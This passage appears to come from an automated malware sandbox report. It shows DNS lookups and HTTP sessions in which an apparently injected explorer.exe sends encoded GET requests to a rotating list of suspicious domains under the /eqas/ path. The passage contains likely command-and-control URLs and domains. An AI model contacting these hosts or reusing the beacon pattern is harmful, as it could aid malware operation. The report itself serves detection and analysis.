Apr 12, 2021 09:45:49.049273968 CEST | 192.168.2.6 | 8.8.8.8 | 0x76f7 | Standard query (0) | www.kakavjesajt.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:54.822232008 CEST | 192.168.2.6 | 8.8.8.8 | 0x1dd4 | Standard query (0) | www.cursosdigitaisbr.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:00.279237032 CEST | 192.168.2.6 | 8.8.8.8 | 0x1b8b | Standard query (0) | www.llmav.xyz | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:05.835242987 CEST | 192.168.2.6 | 8.8.8.8 | 0xb9ff | Standard query (0) | www.360caiyin.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:10.956753969 CEST | 192.168.2.6 | 8.8.8.8 | 0x2afc | Standard query (0) | www.35efb510815e.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:16.721827984 CEST | 192.168.2.6 | 8.8.8.8 | 0x13ee | Standard query (0) | www.nescleanups.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:21.827483892 CEST | 192.168.2.6 | 8.8.8.8 | 0xfe | Standard query (0) | www.stripepayment.online | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:26.930490971 CEST | 192.168.2.6 | 8.8.8.8 | 0xa915 | Standard query (0) | www.beyoncos.com | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:33.058473110 CEST | 192.168.2.6 | 8.8.8.8 | 0x756 | Standard query (0) | www.mg-izkerr8.net | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:55.098449945 CEST | 192.168.2.6 | 8.8.8.8 | 0x92af | Standard query (0) | www.mg-izkerr8.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 09:45:38.181229115 CEST | 8.8.8.8 | 192.168.2.6 | 0x18 | No error (0) | www.cjaccessories.net | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:45:38.181229115 CEST | 8.8.8.8 | 192.168.2.6 | 0x18 | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:43.477227926 CEST | 8.8.8.8 | 192.168.2.6 | 0x601a | No error (0) | www.sportfest40.com | - | 104.21.28.135 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:43.477227926 CEST | 8.8.8.8 | 192.168.2.6 | 0x601a | No error (0) | www.sportfest40.com | - | 172.67.170.213 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:49.195744038 CEST | 8.8.8.8 | 192.168.2.6 | 0x76f7 | No error (0) | www.kakavjesajt.com | kakavjesajt.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:45:49.195744038 CEST | 8.8.8.8 | 192.168.2.6 | 0x76f7 | No error (0) | kakavjesajt.com | - | 176.104.107.18 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:45:54.989849091 CEST | 8.8.8.8 | 192.168.2.6 | 0x1dd4 | No error (0) | www.cursosdigitaisbr.com | cursosdigitaisbr.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:45:54.989849091 CEST | 8.8.8.8 | 192.168.2.6 | 0x1dd4 | No error (0) | cursosdigitaisbr.com | - | 167.114.6.31 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:00.426578045 CEST | 8.8.8.8 | 192.168.2.6 | 0x1b8b | No error (0) | www.llmav.xyz | - | 35.244.230.236 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:05.914354086 CEST | 8.8.8.8 | 192.168.2.6 | 0xb9ff | Server failure (2) | www.360caiyin.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:11.314012051 CEST | 8.8.8.8 | 192.168.2.6 | 0x2afc | No error (0) | www.35efb510815e.com | 34.anxin58.com | - | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 09:46:11.314012051 CEST | 8.8.8.8 | 192.168.2.6 | 0x2afc | No error (0) | 34.anxin58.com | - | 23.225.41.92 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:16.811510086 CEST | 8.8.8.8 | 192.168.2.6 | 0x13ee | Name error (3) | www.nescleanups.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:21.893973112 CEST | 8.8.8.8 | 192.168.2.6 | 0xfe | Name error (3) | www.stripepayment.online | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:27.285378933 CEST | 8.8.8.8 | 192.168.2.6 | 0xa915 | No error (0) | www.beyoncos.com | - | 14.129.120.32 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:27.285378933 CEST | 8.8.8.8 | 192.168.2.6 | 0xa915 | No error (0) | www.beyoncos.com | - | 14.129.120.31 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:33.364765882 CEST | 8.8.8.8 | 192.168.2.6 | 0x756 | No error (0) | www.mg-izkerr8.net | - | 52.79.124.173 | A (IP address) | IN (0x0001)
Apr 12, 2021 09:46:55.480940104 CEST | 8.8.8.8 | 192.168.2.6 | 0x92af | No error (0) | www.mg-izkerr8.net | - | 52.79.124.173 | A (IP address) | IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.cjaccessories.net
                                                                • www.sportfest40.com
                                                                • www.kakavjesajt.com
                                                                • www.cursosdigitaisbr.com
                                                                • www.llmav.xyz
                                                                • www.35efb510815e.com
                                                                • www.beyoncos.com

                                                                HTTP Packets

                                                                 Session ID: 0 | Source IP: 192.168.2.6 | Source Port: 49719 | Destination IP: 23.227.38.74 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:45:38.229357958 CEST | 1268 | OUT | GET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cjaccessories.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:45:38.392312050 CEST | 1270 | IN | HTTP/1.1 403 Forbidden
                                                                Date: Mon, 12 Apr 2021 07:45:38 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                X-Sorting-Hat-PodId: 176
                                                                X-Sorting-Hat-ShopId: 46331166869
                                                                X-Dc: gcp-us-central1
                                                                X-Request-ID: 43a3242b-95f4-408b-8137-67f860923cdc
                                                                Set-Cookie: _shopify_fs=2021-04-12T07%3A45%3A38Z; Expires=Tue, 12-Apr-22 07:45:38 GMT; Domain=cjaccessories.net; Path=/; SameSite=Lax
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                X-Download-Options: noopen
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0966a421d500002c26c3167000000001
                                                                Server: cloudflare
                                                                CF-RAY: 63ead61629122c26-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 33 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e
                                                                Data Ascii: 330<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon


                                                                 Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49723 | Destination IP: 104.21.28.135 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:45:43.519484043 CEST | 1302 | OUT | GET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.sportfest40.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                 Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49730 | Destination IP: 176.104.107.18 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:45:49.271539927 CEST | 1582 | OUT | GET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.kakavjesajt.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:45:49.777462006 CEST | 1597 | IN | HTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:45:49 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.2.22
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8
                                                                Vary: User-Agent
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                 Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49742 | Destination IP: 167.114.6.31 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:45:55.128757954 CEST | 2267 | OUT | GET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cursosdigitaisbr.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:45:55.265363932 CEST | 2839 | IN | HTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 12 Apr 2021 07:45:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                 Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49743 | Destination IP: 35.244.230.236 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:46:00.477360964 CEST | 5382 | OUT | GET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.llmav.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:46:00.808547020 CEST | 5386 | IN | HTTP/1.1 200 OK
                                                                Server: nginx/1.14.0
                                                                Date: Mon, 12 Apr 2021 07:46:00 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 3584
                                                                Last-Modified: Mon, 12 Apr 2021 03:00:16 GMT
                                                                Vary: Accept-Encoding
                                                                ETag: "6073b7c0-e00"
                                                                Cache-Control: no-cache
                                                                Accept-Ranges: bytes
                                                                Via: 1.1 google
                                                                Connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 31 39 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 
72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6f 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6f 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 6f 2c 65 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 6f 2c 65 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6
                                                                Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.19.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){var o=document.createElement("script");o.src="https://hm.baidu.com/hm.js?"+t;var e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(o,e)}function baiduPush(t,o,e){window._hmt.push(["_trackEvent",t,o,e])}console.log("


                                                                 Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49746 | Destination IP: 23.225.41.92 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:46:11.507055998 CEST | 5426 | OUT | GET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.35efb510815e.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:46:11.701028109 CEST | 5426 | IN | HTTP/1.1 302 Moved Temporarily
                                                                Server: openresty/1.19.3.1
                                                                Date: Mon, 12 Apr 2021 07:46:11 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 151
                                                                Connection: close
                                                                Location: https://www.8dq98.com/enter/index.html
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.19.3.1</center></body></html>


                                                                 Session ID: 6 | Source IP: 192.168.2.6 | Source Port: 49752 | Destination IP: 14.129.120.32 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 12, 2021 09:46:27.541057110 CEST | 5462 | OUT | GET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.beyoncos.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                 Apr 12, 2021 09:46:28.299175024 CEST | 5471 | IN | HTTP/1.1 404 Not Found
                                                                Server: httpv2(13.12)
                                                                Date: Mon, 12 Apr 2021 07:46:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 34 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 63 6f 6c 6f 72 3a 20 23 34 46 35 31 35 35 3b 0a 7d 0a 0a 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 33 33 39 39 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 39 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 0a 63 6f 64 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 
6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 75 72 69 65 72 20 4e 65 77 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 32 31 36 36 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 20 31 32 70 78 20 31 30 70 78 3b 0a 7d 0a 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70 78 20 23 44 30 44 30 44 30 3b 0a 7d 0a 0a 70 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 32 70 78 20 31 35 70 78 20 31 32 70 78 20 31 35 70 78 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 